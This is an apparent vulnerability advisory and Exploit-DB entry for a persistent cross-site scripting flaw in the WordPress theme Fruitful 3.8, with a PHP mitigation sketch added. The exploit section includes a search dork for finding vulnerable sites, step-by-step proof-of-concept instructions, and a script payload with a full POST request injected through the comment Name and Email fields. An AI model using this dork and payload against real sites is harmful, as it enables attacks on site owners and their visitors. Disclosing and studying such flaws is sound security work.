Vendor: Fruitful
By: Ultra Security Team (Ashkan Moghaddas, AmirMohammad Safari)
CVSS: 7.5 (HIGH)
Persistent Cross-Site Scripting
CWE: 79
Product Name: Fruitful
Affected Version From: 3.8
Affected Version To: 3.8
Patch Exists: NO
Related CWE: N/A
CPE: a:fruitfulcode:fruitful
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows/Linux
2020

WordPress Theme Fruitful 3.8 – Persistent Cross-Site Scripting

Fruitful is a free, responsive WordPress theme with a powerful theme options panel and a simple, clean front-end design. To exploit this vulnerability, an attacker can inject malicious JavaScript code into the Name and Email fields of the comment form. When the comment is posted, the injected code is stored with it and executed in the browser of any user who views the comment.

Mitigation:

To mitigate this vulnerability, the application should validate user input and sanitize it before displaying it to other users.
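
The mitigation above, sketched as an added example in plain PHP (it is not Fruitful's or WordPress's own code): the Name and Email fields are validated on input and encoded on output. The field names `author` and `email` come from the POST request on this page; the function names are hypothetical.

```php
<?php
// Added example, not Fruitful's code. Field names (author, email) follow the
// POST request on this page; all function names here are hypothetical.

/** Input check: returns the names of fields that fail validation. */
function invalid_comment_fields(array $post): array
{
    $bad    = [];
    $author = trim((string) ($post['author'] ?? ''));
    $email  = trim((string) ($post['email'] ?? ''));

    // A display name never needs angle brackets or control characters.
    if ($author === '' || strlen($author) > 200 || preg_match('/[<>\x00-\x1f]/', $author)) {
        $bad[] = 'author';
    }
    // Accept only a syntactically valid address.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $bad[] = 'email';
    }
    return $bad;
}

/** Output encoding for HTML text and quoted attribute values. */
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Moderation-view link: stored values are escaped even if never validated. */
function render_comment_author(array $comment): string
{
    return sprintf(
        '<a class="comment-author" href="mailto:%s">%s</a>',
        esc($comment['email']),
        esc($comment['author'])
    );
}

// Constructed input reusing the markup string from the advisory's tested payload.
$payload = '\'>"><script>alert(/XSS By UltraSecurity/)</script>';
$post    = ['author' => $payload, 'email' => $payload];

// Input gate first, then output encoding of a value that is already stored.
print_r(invalid_comment_fields($post));
echo render_comment_author($post), "\n";
```

Output encoding is the control that matters for comments already in the database; in a WordPress theme the equivalent calls are `esc_html()` and `esc_attr()`.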

Exploit-DB raw data:

# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A

.:: Theme Description ::.
Fruitful is a free WordPress responsive theme with a powerful theme options panel and a simple, clean front-end design.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With above Dork.
Step 2 - Inject Your JavaScript Code into the Name & Email Fields
Step 3 - Click Post Comment

.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>

.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145